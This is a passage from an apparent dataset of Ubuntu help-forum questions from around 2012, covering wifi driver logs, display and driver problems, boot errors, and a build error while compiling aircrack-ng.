ubuntubox kernel : [ 12687.563249 ] copyright ( c ) 2003-2012 intel corporation may 8 05:44:05 ubuntubox kernel : [ 12687.563435 ] iwlwifi 0000:02:00.0 : pci_resource_len = 0x00002000 may 8 05:44:05 ubuntubox kernel : [ 12687.563442 ] iwlwifi 0000:02:00.0 : pci_resource_base = ffffc900051fc000 may 8 05:44:05 ubuntubox kernel : [ 12687.563449 ] iwlwifi 0000:02:00.0 : hw revision id = 0x0 may 8 05:44:05 ubuntubox kernel : [ 12687.570648 ] iwlwifi 0000:02:00.0 : loaded firmware version 8.83.5.1 build 33692 may 8 05:44:05 ubuntubox kernel : [ 12687.571146 ] iwlwifi 0000:02:00.0 : config_iwlwifi_debug disabled may 8 05:44:05 ubuntubox kernel : [ 12687.571152 ] iwlwifi 0000:02:00.0 : config_iwlwifi_debugfs enabled may 8 05:44:05 ubuntubox kernel : [ 12687.571158 ] iwlwifi 0000:02:00.0 : config_iwlwifi_device_tracing enabled may 8 05:44:05 ubuntubox kernel : [ 12687.571164 ] iwlwifi 0000:02:00.0 : config_iwlwifi_device_testmode enabled may 8 05:44:05 ubuntubox kernel : [ 12687.571170 ] iwlwifi 0000:02:00.0 : config_iwlwifi_p2p disabled may 8 05:44:05 ubuntubox kernel : [ 12687.571178 ] iwlwifi 0000:02:00.0 : detected intel ( r ) wifi link 5100 agn , rev=0x54 may 8 05:44:05 ubuntubox kernel : [ 12687.571285 ] iwlwifi 0000:02:00.0 : l1 enabled ; disabling l0s may 8 05:44:06 ubuntubox kernel : [ 12687.604278 ] iwlwifi 0000:02:00.0 : device eeprom ver=0x11f , calib=0x4 may 8 05:44:06 ubuntubox kernel : [ 12687.604289 ] iwlwifi 0000:02:00.0 : device sku : 0xf0 may 8 05:44:06 ubuntubox kernel : [ 12687.604296 ] iwlwifi 0000:02:00.0 : valid tx ant : 0x2 , valid rx ant : 0x3 may 8 05:44:06 ubuntubox kernel : [ 12687.604329 ] iwlwifi 0000:02:00.0 : tunable channels : 13 802.11bg , 24 802.11a channels may 8 05:44:06 ubuntubox kernel : [ 12688.405992 ] psmouse serio2 : synaptics : touchpad model : 1 , fw : 7.2 , id : 0x1c0b1 , caps : 0xd04733/0xa40000/0xa0000 may 8 05:44:06 ubuntubox kernel : [ 12688.451546 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio2/input/input14 may 8 05:44:08 ubuntubox kernel : [ 12689.945926 ] iwlwifi 0000:02:00.0 : l1 enabled ; disabling l0s may 8 05:44:08 ubuntubox kernel : [ 12689.955185 ] iwlwifi 0000:02:00.0 : radio type=0x1-0x2-0x0 may 8 05:44:08 ubuntubox kernel : [ 12690.082356 ] iwlwifi 0000:02:00.0 : l1 enabled ; disabling l0s may 8 05:44:08 ubuntubox kernel : [ 12690.085386 ] iwlwifi 0000:02:00.0 : radio type=0x1-0x2-0x0 may 8 05:44:08 ubuntubox kernel : [ 12690.137134 ] addrconf ( netdev_up ) : wlan0 : link is not ready may 8 05:44:09 ubuntubox kernel : [ 12690.809060 ] nmi watchdog : enabled , takes one hw-pmu counter . may 8 05:44:09 ubuntubox kernel : [ 12690.809136 ] nmi watchdog : enabled , takes one hw-pmu counter . may 8 05:44:15 ubuntubox kernel : [ 12696.651391 ] addrconf ( netdev_change ) : wlan0 : link becomes ready may 8 05:44:20 ubuntubox kernel : [ 12701.656253 ] cfg80211 : calling crda to update world regulatory domain may 8 05:44:20 ubuntubox kernel : [ 12701.674667 ] cfg80211 : world regulatory domain updated : may 8 05:44:20 ubuntubox kernel : [ 12701.674670 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) may 8 05:44:20 ubuntubox kernel : [ 12701.674675 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 8 05:44:20 ubuntubox kernel : [ 12701.674680 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) may 8 05:44:20 ubuntubox kernel : [ 12701.674685 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) may 8 05:44:20 ubuntubox kernel : [ 12701.674689 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 8 05:44:20 ubuntubox kernel : [ 12701.674693 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 8 05:44:20 ubuntubox kernel : [ 12701.677556 ] iwlwifi 0000:02:00.0 : l1 enabled ; disabling l0s may 8 05:44:20 ubuntubox kernel : [ 12701.684066 ] iwlwifi 0000:02:00.0 : radio type=0x1-0x2-0x0 may 8 05:44:20 ubuntubox kernel : [ 12701.735617 ] addrconf ( netdev_up ) : wlan0 : link is not ready may 8 05:44:20 ubuntubox kernel : [ 12701.887209 ] iwlwifi 0000:02:00.0 : l1 enabled ; disabling l0s may 8 05:44:20 ubuntubox kernel : [ 12701.890478 ] iwlwifi 0000:02:00.0 : radio type=0x1-0x2-0x0 may 8 05:44:20 ubuntubox kernel : [ 12701.939523 ] addrconf ( netdev_up ) : wlan0 : link is not ready may 8 05:44:20 ubuntubox kernel : [ 12702.437321 ] addrconf ( netdev_up ) : eth0 : link is not ready may 8 05:44:28 ubuntubox kernel : [ 12710.154644 ] addrconf ( netdev_change ) : wlan0 : link becomes ready may 8 05:44:48 ubuntubox kernel : [ 12730.051190 ] cfg80211 : calling crda to update world regulatory domain may 8 05:44:48 ubuntubox kernel : [ 12730.062972 ] cfg80211 : world regulatory domain updated : may 8 05:44:48 ubuntubox kernel : [ 12730.062975 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) may 8 05:44:48 ubuntubox kernel : [ 12730.062980 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 8 05:44:48 ubuntubox kernel : [ 12730.062984 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) may 8 05:44:48 ubuntubox kernel : [ 12730.062989 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) may 8 05:44:48 ubuntubox kernel : [ 12730.062994 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 8 05:44:48 ubuntubox kernel : [ 12730.062998 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) $ sudo tail -f /var/log/messages ( killing wifi with hardware switch , turning back on ) may 8 05:53:49 zephyr kernel : [ 13271.516713 ] iwlwifi 0000:02:00.0 : rf_kill bit toggled to enable radio . may 8 05:53:50 zephyr kernel : [ 13271.819483 ] iwlwifi 0000:02:00.0 : l1 enabled ; disabling l0s may 8 05:53:50 zephyr kernel : [ 13271.822543 ] iwlwifi 0000:02:00.0 : radio type=0x1-0x2-0x0 may 8 05:53:50 zephyr kernel : [ 13271.875392 ] addrconf ( netdev_up ) : wlan0 : link is not ready may 8 05:53:57 zephyr kernel : [ 13279.570132 ] addrconf ( netdev_change ) : wlan0 : link becomes ready may 8 05:54:18 zephyr kernel : [ 13300.056967 ] cfg80211 : calling crda to update world regulatory domain may 8 05:54:18 zephyr kernel : [ 13300.066622 ] cfg80211 : world regulatory domain updated : may 8 05:54:18 zephyr kernel : [ 13300.066625 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) may 8 05:54:18 zephyr kernel : [ 13300.066630 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 8 05:54:18 zephyr kernel : [ 13300.066635 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) may 8 05:54:18 zephyr kernel : [ 13300.066639 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) may 8 05:54:18 zephyr kernel : [ 13300.066644 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 8 05:54:18 zephyr kernel : [ 13300.066648 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 8 05:54:25 zephyr kernel : [ 13306.917810 ] iwlwifi 0000:02:00.0 : rf_kill bit toggled to disable radio . may 8 05:54:25 zephyr kernel : [ 13306.918640 ] iwlwifi 0000:02:00.0 : not sending command - rf kill troubleshooting can not connect to open aps or wpa2 aps once the network problems start , plugging in a usb wifi adapter w/ atheros chipset results in the same problem with both cards . this usb device is known to work with ubuntu `` out of the box '' , suggesting it is not an iwlwifi driver problem . disabling `` n '' mode does not work : `` options iwlwifi 11n_disable=1 '' in /etc/modprobe.d/disable11n.conf no option to use ndiswrapper for this wifi card ( which is probably a good thing ! ) unloading iwlwifi before suspend does not work : suspend_modules= '' $ suspend_modules iwlwifi '' in /etc/pm/config.d/unload_modules switching to kernel 2.6.39 ( with iwlagn driver ) , 3.3.0 , 3.4.0rc5 does not work removing the acer_wmi module ( sudo rmmod acer_wmi ) does not work , and disables bluetooth '' sudo /etc/init.d/networking restart '' does not work '' sudo stop network-manager & & sudo start network-manager '' does not work '' sudo rmmod iwlwifi & & sudo modprobe iwlwifi '' does not work deleting the connection in network manager and recreating it from scratch does not work using wicd to manage the network does n't work any ideas ?
133772	problem with the keyboard layout in emacs ( ubuntu 12.04 )	i 've got some problems with the keyboard layout . i have a french azerty keyboard . when i switch to another layout ( i tested both programmer dvorak and greek ) everything seems fine . however , in emacs , i have a more unexpected ( at least for me ) behavior . for example , in dvorak , i thought to obtain : on my french keyboard - > dvorak x - > q alt-x - > alt-q but i have : x - > q alt-x - > alt-x when i press the alt key , the layout change seems to be inactivated . i precise i did n't activated any shortcut containing the alt key for the layout switching . moreover , i 'm not sure this behavior is restricted to emacs , but i do n't use shortcuts like alt- ... in another application . is a such behavior normal ? and in this case , how can i use a shortcut like alt-q when i switch to dvorak ?
133774	some menu items of libreoffice only show a dash or are invisible	i 'm having the strangest problem , some menu items ( if not most ) of libreoffice are missing , they show a dash instead . here 's a picture of it : does anyone know how to solve this problem ?
133776	how can i disable [ alt ] for search ?	in 12.04 , the [ alt ] key pops up the hud . that 's not a problem , but , when using [ alt ] + ... it pops up as well . for instance on pushing [ alt ] + [ left arrow ] which i use continually when navigating with firefox ( that 's the 'back ' functionality ) . is there a way to prevent this from happening ?
133778	cpu working hard while sleeping after upgrading to 12.04	i just upgraded to 12.04 . i noticed a new weird behavior that did not happen on 11.10 . when i lock the screen , or when it sleeps automatically after the computer is idle , the cpu fan starts working hard ( which usually means the cpu itself is working hard ) . when i return from the sleep to re-enter my password , the fan subsides . i noticed some bugs related to compiz ( compiz makes cpu run at 100 % when in suspend mode in 12.04 ) , but i tried the suggestions there , and none seem to help . any ideas on how to check what 's making the cpu work hard , or how to stop it from doing so ?
133784	how to save after editting 'vi common.mak ' ( aircrack-ng ) on ubuntu 12.04	i followed the steps from here > > http : //securit.se/en/2012/03/kompilera-reaver-ubuntu-12-04/ everything was going good till i reached this point . after i found the following lines in the file cflags ? = -g -w -wall -werror -o3 and edited it to make it like this > > cflags ? = -g -w -wall -o3 but then i am supposed to save the file , how ? . when i close the terminal i was expecting them to prompt 'save file before exit ' but it does not , theres just 2 options 'cancel ' and 'close terminal' how do i save ?
133792	scrambled video when using logitech usb headset	when i make a skype video call and the logitech usb headset is selected as sound device , the video is scrambled . it normalizes even during the call as soon as i select the built-in sound device . is there a way to troubleshoot this issue ? i have a lenovo t400 running ubuntu oneiric and using the latest skype 2.2.0.35 .
133793	nvidia config error on login of ubuntu 12.04	i have an apple macbookpro 5,3 and i have a 23 ' cinema display setup on the dvi port . i have the nvidia x server set up to do twinview and all is well other than i get the following error when login of my user account from a fresh restart . none of the selected modes were compatible with the possible modes : trying modes for crtc 351 crtc 351 : trying mode 3360x1200 @ 50hz with output at 1440x900 @ 50hz ( pass 0 ) crtc 351 : trying mode 3360x1200 @ 50hz with output at 1440x900 @ 50hz ( pass 1 ) here is what my config file looks like located in /etc/x11/xorg.conf nvidia-settings : x configuration file generated by nvidia-settings nvidia-settings : version 295.33 ( buildd @ allspice ) fri mar 30 15:25:24 utc 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` apple '' horizsync 30.0 - 75.0 vertrefresh 60.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 9600m gt '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 1 '' option `` twinviewxineramainfoorder '' `` dfp-1 '' option `` metamodes '' `` dfp-0 : nvidia-auto-select +1920+0 , dfp-1 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection
133795	is there a quick way to kill hundreds of alert dialogs ?	i 've got hundreds and hundreds of wireless password alerts on my desktop ( possibly related to repeated request for wireless password , no wireless connection ) -- while i troubleshoot the source of the alerts i 'm wondering if there 's a clean way to just cancel them all ?
133802	disable removable device notification for hard drives	i 'm using ubuntu 12.04 with two hard drives . the second drive is set to mount to /home/myuser/data and it mounts ok . however gnome shows a 'removable devices ' item in notification area which lists my hard drive with the unmount button . how do i make ubuntu to treat the second hdd like the system one , without suggesting me to unmount it in the notification area ?
133806	getting an error when using 'make ' command ( installing aircrack-ng on ubuntu 12.04 )	i followed these instructions . i edited the common.mak file successfully and when i ran make i get this error : mohd-arafat-hossain @ tud : ~/aircrack-ng-1.1 $ make make -c src all make [ 1 ] : entering directory `/home/mohd-arafat-hossain/aircrack-ng-1.1/src' make -c osdep make [ 2 ] : entering directory `/home/mohd-arafat-hossain/aircrack-ng-1.1/src/osdep' building for linux make [ 3 ] : entering directory `/home/mohd-arafat-hossain/aircrack-ng-1.1/src/osdep' make [ 3 ] : `.os.linux ' is up to date . make [ 3 ] : leaving directory `/home/mohd-arafat-hossain/aircrack-ng-1.1/src/osdep' make [ 2 ] : leaving directory `/home/mohd-arafat-hossain/aircrack-ng-1.1/src/osdep' gcc -g -w -wall -o3 -d_file_offset_bits=64 -d_revision=0 -iinclude -c -o aircrack-ng.o aircrack-ng.c in file included from aircrack-ng.c:65:0 : crypto.h:12:26 : fatal error : openssl/hmac.h : no such file or directory compilation terminated . make [ 1 ] : *** [ aircrack-ng.o ] error 1 make [ 1 ] : leaving directory `/home/mohd-arafat-hossain/aircrack-ng-1.1/src' make : *** [ all ] error 2 what am i supposed to do now ?
133807	how to config start services with upstart ?	since upstart 1.5 comes with ubuntu 12.04 , bum and sysv-rc-conf is no longer effective on it . how can i config ?
133809	mute sound on headphone unplug ?	is there a way of muting sound from my computer everytime i unplug my headphones ( like a phone does ) to stop sound then playing out of my speakers ?
133813	removing annoying delay in optirun	can i somehow remove the ~4 seconds delay present in calls to optirun ? i need my compiler-run iterations to run faster . does bumblebeed play a role in this ? i 'm sitting on ubuntu 12.04 on an asus x53s with nvidia geforce gt 630m .
133814	11.04 kiosk wireless issue	i 'm running into a bit of a snag , using natty ... i work for a small school district and we have laptops we allow some home-schooled student to check out . we 've currently setup the machines in kiosk mode so that the student is immediately logged into our web-based virtual desktop , which works really well -- if on a wired connection . the two issues we 've encountered are 1 ) how to allow the wireless config to show before the browser so they can choose a connection ( panera , mcdonald 's , school 's , etc ) ? we put them in the startup script , but the browser hides the wireless config and alt-tab is disabled . 2 ) is there a way to overcome free wifi connections that require a eula/terms page pop-up before allowing surfing ( such as caching that page ) ? thanks ! stephen
133818	how can i add pdt ( pacific daylight time ) to the date & time panel	i would like to add pdt to the list of locations in the date & time panel . i have utc , so i think that in general , abstract locations are working . but when trying to add pdt , i only get this unresponsive stop-icon . so : is there a way to add pdt to the list ?
133820	my hard drives are gone	i just replaced windows 7 with ubuntu 12.04 on my pc but it formated the c drive which had the windows 7 in it , and now ubuntu is installed and is fully working , but none of my hard drives are there anymore , both of them were there at the trial all my folders stored in it were there , but now they do n't show anymore . i ca n't afford to lose them
133822	is there a way to schedule aptd to check for updates only at certain times ?	on ubuntu 12.04 i 've noticed that aptd sometimes uses 100 % of a cpu and tends to slow down my whole laptop . i was n't installing any packages so i 'm assuming that this is the automatic update check . is there a way to schedule aptd to only check for updates at certain times ? i checked the crontab for root but dow n't see anything in there . thanks in advance .
133830	can ubuntu linux be responsible for low cpu fan rpm ?	my system config is as below : processor : core 2 duo e7500 2.93 ghz motherboard : asus p5qpl-am i am encountering concurrent system failures ; my system suddenly goes off , hard drive stops spinning , but i can see there is still power on the board . my thought is that this may be due to a kernel issue or over-heating , looking at the numbers above , i have a few questions about what this report tells me ; are there any red flags to this reading ? i do n't have chassis fan . should i install one ? is there something else fan or heat related i can do ?
133831	repeated error : `` target filesystem does n't have requested /sbin/init ''	in the past few weeks when i turned my computer on it wrote me this error : mount : mounting /dev/disk/by-uuid/280914ad-ed45-4948-bfdf-9 ac440455635 on /root failed : invalid argument mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing init=bootarg . busy box v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) i fixed it by booting from a live cd and type in the terminal : e2fsck -f -y -v /dev/sda1 but every few reboots i get the same error . if someone know what cause this error and how to get it fixed permanently i 'll be grateful . thanks in advance . well it happend again . this is the : `` e2fsck -f -y -v /dev/sda1 '' command output : ubuntu @ ubuntu : ~ $ sudo e2fsck -f -y -v /dev/sda1 e2fsck 1.42 ( 29-nov-2011 ) /dev/sda1 : recovering journal error reading block 2655492 ( attempt to read block from filesystem resulted in short read ) . ignore error ? yes force rewrite ? yes clearing orphaned inode 265302 ( uid=1000 , gid=1000 , mode=0100600 , size=8192 ) pass 1 : checking inodes , blocks , and sizes inode 1182032 , i_size is 31422 , should be 40960 . fix ? yes inode 1182032 , i_blocks is 72 , should be 88 . fix ? yes pass 2 : checking directory structure pass 3 : checking directory connectivity pass 4 : checking reference counts inode 1182190 ref count is 1 , should be 2 . fix ? yes unattached inode 1182583 connect to /lost+found ? yes inode 1182583 ref count is 2 , should be 1 . fix ? yes pass 5 : checking group summary information block bitmap differences : +595467 +595478 fix ? yes free blocks count wrong for group # 18 ( 29091 , counted=29089 ) . fix ? yes free blocks count wrong ( 5135588 , counted=5135536 ) . fix ? yes free inodes count wrong ( 1341369 , counted=1341362 ) . fix ? yes /dev/sda1 : file system was modified 184558 inodes used ( 12.09 % ) 107 non-contiguous files ( 0.1 % ) 188 non-contiguous directories ( 0.1 % ) # of inodes with ind/dind/tind blocks : 0/0/0 extent depth histogram : 143481/16 967760 blocks used ( 15.86 % ) 0 bad blocks 1 large file 111100 regular files 18489 directories 57 character device files 25 block device files 0 fifos 2 links 54874 symbolic links ( 40967 fast symbolic links ) 4 sockets -- -- -- -- 184550 files ubuntu @ ubuntu : ~ $ please help me i do n't now what more i can do .
133832	is there any donors list ?	i wonder if there is any list for companies that donate money to ubuntu . these companies are not necessarily from it and since they are using ubuntu in their daily bases intensively , they would like to have some donation . but it is important to know how these donation will be spent and if their donations will be shown to public ! ! so , the question is if there is any list of these companies ? like the one in r project
133835	do themes slow down ubuntu 's performance ?	ubuntu ( 12.04 ) comes with pre-installed themes . if i were to install extra themes , then does running them slow down performance in any way , even slightly ? in other words , are the default themes technically the quickest ( in terms of rendering , animation , etc ) ?
133836	do i keep my windows installation if i install ubuntu with wubi , the windows installer ?	i want to know if i will keep and still be able to use my windows 7 installation after i use the wubi windows installer ( from here ) to install ubuntu ? thanks in advance , bas .
133841	num pad on apple keyboard in java application fires two events	i use netbeans ide 7.1.2 for development on ubuntu 12.04 . when typing numbers with the num pad the digit is displayed and the cursor relocated as if used the num pad with num lock disabled . in eclipse the keyboard mapping is fine . all i could find on this topic is this : http : //netbeans.org/bugzilla/show_bug.cgi ? id=145417 i also tried using a different jvm ( oracle instead of openjdk ) with the same results .
133842	fan heavily works in ubuntu 12.04	i had ubuntu 11.04 on my acer 1410 , and everything was working smoothly . i made a fresh installation of 12.04 . now the fan works heavily ( noisy ) all the time , even when no software is open . here is the result of sensors command : coretemp-isa-0000 adapter : isa adapter core 0 : +30.0°c ( high = +105.0°c , crit = +105.0°c ) acerhdf-virtual-0 adapter : virtual device temp1 : +55.0°c ( crit = +63.0°c ) i think the problem should be associated with drivers , but why on ubuntu 12.04 , and how to update drivers properly ?
133844	fglrx causes serious bug-black screen !	i downloaded newest driver from ati site and installed it ... now at start-up i see a black screen and message : '' your screen , graphics card , and input device settings could not be detected correctly.you will need to configure these yourself . '' i press enter and move to next screen with message : '' what would you like to do ? '' and listed below : '' run in low graphics mode for just one session . '' ( it is marked ) and some other options that could not possibly to mark with tab or up , down , left , right or shift key ... ( no cursor ) . i can not login to system and can not use it ! what should i do ?
133845	deciding between virtual machine or dual-boot setup	i would like to set-up a pc to run ubuntu most of the time , but also need to run xp for specific applications and testing . in the past i would have simply set up a dual boot machine and then restart and boot into windows xp as needed . however since the machine has multiple cores and significant memory , i think i can use virtual box , xen , or vmware hypervisors . i am thinking of making ubuntu the `` host '' vm and having xp as a guest vm . this would be especially nice for testing/debug/development since it is possible to run applications in both os 's simultaneously . i 've never setup a virtual machine before and think that by asking the questions below i can avoid some trial-and-error . basically , i need to decide if a dual boot or vm setup is more appropriate for what i want to do . here 's my questions : i do not always need to have xp running . do the hypervisors allow me to shut the guest vm down so that the host vm can then immediately use all memory and processor resources ? when i then bring up the guest vm , is it easy to provision how much memory and other resources are used by it ? ideally , i 'd like to pre-configure this in advance and then toggle the guest vm off/on without thinking about it . is it possible or advisable to have the host os be 64bit and the guest os be 32bit ? alternatively , if both vm 's are 32 bit and i have 8g of ram , can the hypervisor provision each vm with 4g of ram when they are running simultaneously ? which hypervisors are best for set-ups such as i described ?
133852	gdm only starts an xterm ; how to get back my desktop ?	on my intel integrated graphics touchscreen with ubuntu 10.04 lts , after an apt-get upgrade from 10.04.1 lts to 10.04.4 lts , sudo less /var/log/gdm/:0-slave.log shows 3 lines , the first being : gdm-session-worker [ 1040 ] : glib-gobject-critical : g_value_get_boolean : assertion 'g_value_holds_boolean ( value ) ' failed . i rebooted and still ended up at a blank black screen with an undecorated white terminal window in the upper left corner . ctrl+alt+f1 to login at a text console and sudo ps x |grep gdm show gdm-binary , gdm-simple-slave , and x auth gdm aotaim or something , and gdm-session-worker running . sudo service gdm restart merely restarts the same x session . how do i get my gnome taskbar etc . back ? sudo service gdm stop & & startx almost works ( my taskbar does n't appear when i press alt+f1 ) , but how should i fix it properly ? xterm $ gdmsetup xterm $ cat /etc/gdm/custom.conf [ daemon ] automaticloginenable=true automaticlogin=b timedloginenable=true timedlogin=b timedlogindelay=10 xterm $ sudo nano /etc/gdm/custom.conf xterm $ cat /etc/gdm/custom.conf [ daemon ] automaticloginenable=true automaticlogin=b timedloginenable=true timedlogin=b timedlogindelay=10 defaultsession=gnome xterm $ sudo reboot no difference . gdmsetup still wo n't unlock . when ran with sudo , the unlock button greys out but i still ca n't change the settings .
133859	how do i install a new kde theme ?	i have been trying out kde in ubuntu 12.04 recently , and have downloaded a few themes from kde-look.org but i have no idea how to change the theme ? i can select a theme from the inbuilt repo from the settings , but how do i apply a theme that i have downloaded from the kde-look site ( this for example http : //kde-look.org/content/show.php/amakage ? content=150285 ) , any clues ? thanks
133867	lxde chromium help	under xfce , i managed to specify which user chromium should start up with when an icon on the panel was clicked . /usr/bin/chromium-browser -- user-data-dir=/home/myaccountname/.config/chromium/profile 2 my question is , how can i make something like this in lxde ? i can not specify icons nor can i set up a command to run at start . any help would be appreciated .
133874	synchronize profiles across servers ( .vimrc and .bashrc )	i 'm on a few different servers on any given day . i 'm starting to really tweak two files in my bash profile : .vimrc and alias.sh . would anyone have a recommended way to save and sync these two files . perhaps using rsync or unison ( over ssh using a predefined shared key ) ? has anyone set this up before ?
133875	upgraded `` compiz ' and `` unity '' , now no unity 3d on screen	today when i logged in to my ubuntu 12.04 , the update manager told me of some upgrades . compiz and unity were in those upgrades . after i installed the upgrades , i can no longer get the unity panel on the left side of screen or the systray at the top of screen . i now have to run ubuntu 12.04 with unity 2d . my laptop is a hp pavilion dv9000 with nvidia geforce go 7600 video . i tried to run `` unity -- reset '' but it says there are serious issues with compiz . i have cut & pasted the read out from the terminal below . [ 09:35:02 ] xxxxxxx @ l01u1204 : ~ $ unity -- reset unity-panel-service : no process found checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done compiz ( core ) - warn : failed to receive configurenotify event on 0x2e00004 compiz ( core ) - warn : failed to receive configurenotify event on 0x580005a compiz ( core ) - warn : failed to receive configurenotify event on 0x3600006 compiz ( core ) - warn : failed to receive configurenotify event on 0x3200255 compiz ( core ) - warn : failed to receive configurenotify event on 0x1600002 compiz ( core ) - warn : failed to receive configurenotify event on 0x1400002 initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing snap options ... done initializing mousepoll options ... done initializing resize options ... done initializing place options ... done initializing move options ... done initializing wall options ... done initializing grid options ... done i/o warning : failed to load external entity `` /home/brwright/.compiz/session/10afaca1703486b216133648409481824100000130110002 '' initializing session options ... done initializing gnomecompat options ... done initializing animation options ... done initializing fade options ... done initializing unitymtgrabhandles options ... done initializing workarounds options ... done initializing scale options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done compiz ( core ) - error : could n't load plugin '/usr/lib/compiz/libunityshell.so ' : /usr/lib/compiz/libunityshell.so : undefined symbol : _znk5unity4dash10controller6windowev compiz ( core ) - error : could n't load plugin 'unityshell' compiz ( core ) - warn : unhandled configurenotify on 0x7000090 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0x7000093 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0x7000096 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0x7000099 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0x700009c ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0x700009f ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . initializing annotate options ... done initializing blur options ... done initializing clone options ... done initializing colorfilter options ... done initializing commands options ... done initializing cube options ... done initializing imgjpeg options ... done initializing kdecompat options ... done initializing mag options ... done initializing neg options ... done initializing obs options ... done initializing opacify options ... done initializing put options ... done initializing resizeinfo options ... done initializing ring options ... done initializing rotate options ... done initializing scaleaddon options ... done initializing screenshot options ... done initializing shift options ... done initializing staticswitcher options ... done initializing switcher options ... done initializing thumbnail options ... done initializing unityshell options ... done initializing water options ... done initializing winrules options ... done initializing wobbly options ... done setting update `` main_menu_key '' setting update `` run_key '' starting gtk-window-decorator as you can see the terminal never comes back to the ci prompt . i must do a control c to get to the ci prompt , but then the os is frozen . i have to reboot and run unity 2d in able to do anything on my laptop . i hope i have explained this enough and provided some useful info . i am at a loss to understand what the problem is , or what exactly what is causing the problem . is it unity or compiz ? can anyone help ?
133879	can an external flash or hard drive be used to boost performance , similar to windows ' readyboost ?	i have a number of spare external hard disk drives lying about the place and i was wondering if there is any practical way of using an external hard drive or usb flash memory drive to boost performance in ubuntu ? the idea sprang from using a windows pc and plugging in a usb device which prompted a pop-up asking whether i wanted the usb to be used for readyboost to speed up my system . i imagine that this may well have no relevance to a linux system but would be interested to know if there is any practical way of using an external hard drive for potential performance gain .
133884	problem with chromium and google chrome	each time i got to specific sites on the internet which i use regularly with both google chrome and chromium ( i recently change from chrome because of one question that i read here ) the page loads for one second i see the site appearing and then it show me a blue screen no matter how many times i reload it .
133890	using optirun makes acer aspire 5755g laptop overheat	using optirun from the bumblebee package makes my laptop ( acer aspire 5755g ) overheat after some time while the fans do n't seem to run using the highest performance yet .
133893	re-install a set of deb files on another machine without re-downloading	i made a setup for development , and it downloaded a large set of .deb files . now , i want to re-do this for a presentation , but i do not want to re-download the 400 files live . that would take too long . how can i get those files copied to /var/cache/apt and quickly reinstall them from local files . will having the files locally avoid the download ?
133894	screen turns black after booting , backlight only works in recovery mode on an acer aspire 5736z	the screen turns black after booting . you need to use spotlight to see what is what is displayed on the screen but the backlight works on recovery mode . so my question is how can this problem be fixed .
133895	how do i turn off hold super for shortcut list ?	i like to map changing desktops to super + arrow keys , but in the newest version of unity it seems to show up a keyboard shortcut list , even after i start clicking the arrow keys . is there any way to turn off the shortcut list pop up ? or do i just need to change my mappings ? edit : it also appears to not like to close the workspace manager when the super key is let go , i 'm not sure if this is an issue because i switched from 2d to default , or by upgrading .
